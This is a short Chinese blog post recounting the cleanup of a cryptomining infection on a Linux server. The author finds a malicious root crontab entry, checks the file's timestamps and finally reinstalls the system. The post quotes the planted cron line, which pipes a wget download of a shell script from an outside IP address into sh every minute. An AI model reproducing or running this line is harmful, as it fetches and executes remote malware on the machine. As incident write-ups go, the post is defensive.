当前位置: 首页 > news >正文

一次挖矿病毒的排查过程

目录

  • 一、查看定时任务
  • 二、处理方法


一、查看定时任务

# crontab -l
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1
0 */1 * * * /usr/local/nginx/sbin/nginx -s reload

发现异常任务:

* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

查 IP 发现为来自俄罗斯的恶意 IP:
在这里插入图片描述
在这里插入图片描述
查看主机环境变量已被更改,相关命令无法使用,且主机中异常计划任务早于2023-07-04 就已被植入:

# cat /var/spool/cron/root
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1
0 */1 * * * /usr/local/nginx/sbin/nginx -s reload
# stat /var/spool/cron/rootFile: ‘/var/spool/cron/root’Size: 125       	Blocks: 8          IO Block: 4096   regular file
Device: fd01h/64769d	Inode: 552530      Links: 1
Access: (0600/-rw-------)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-06-06 10:39:22.013106004 +0800
Modify: 2023-07-04 12:50:46.478638868 +0800
Change: 2023-07-04 12:50:46.478638868 +0800

二、处理方法

清除异常任务,重启服务器。
由于重启前后,相关命令如ps、ls等都无法使用,最后重装系统!

http://www.lryc.cn/news/364989.html

相关文章:

  • 【JMeter接口测试工具】第二节.JMeter基本功能介绍(上)【入门篇】
  • ultralytics solutions快速解决方案,快速实现某些场景的图像解决方案
  • iphone突然黑屏?3种方法解决问题!
  • nn.GRU和nn.GRUCell区别
  • Coolmuster Android助手评测:简化Android到电脑的联系人传输
  • 【杂记-webshell恶意脚本木马】
  • 锻炼 精读笔记 01
  • 基于pytorch的车牌识别
  • 红酒:如何避免红酒过度氧化
  • FreeRTOS学习笔记-基于stm32(9)信号量总结(二值信号量、计数型信号量、互斥信号量、优先级翻转、优先级继承)
  • 归并排序——二路归并排序
  • java-StringBuilder
  • 数据结构 | 超详细讲解七大排序(C语言实现,含动图,多方法!)
  • 企业自建邮件系统的优势,安全性更高,功能更灵活,维护更便捷
  • Softing工业助力微软解锁工业数据,推动AI技术在工业领域的发展
  • 企微自动化机器人的应用与前景
  • 从零开始:如何用Electron将chatgpt-plus.top 打包成EXE文件
  • 基于RNN和Transformer的词级语言建模 代码分析 log_softmax
  • Python爬虫要掌握哪些东西
  • FPGA-ARM架构与分类
  • docker网络详解
  • 设计软件有哪些?效果工具篇(1),渲染100邀请码1a12
  • Iphone自动化指令每隔固定天数打开闹钟关闭闹钟(二)
  • 计算机网络错题答案汇总
  • Fortigate防火墙二层接口的几种实现方式
  • 如何永久擦除Android手机中的所有个人数据?
  • 使用手机小程序给证件照换底色
  • C语言杂谈:函数栈帧,函数调用时到底发生了什么
  • 【Qt】win10,QTableWidget表头下无分隔线的问题
  • 前端 实现有时间限制的缓存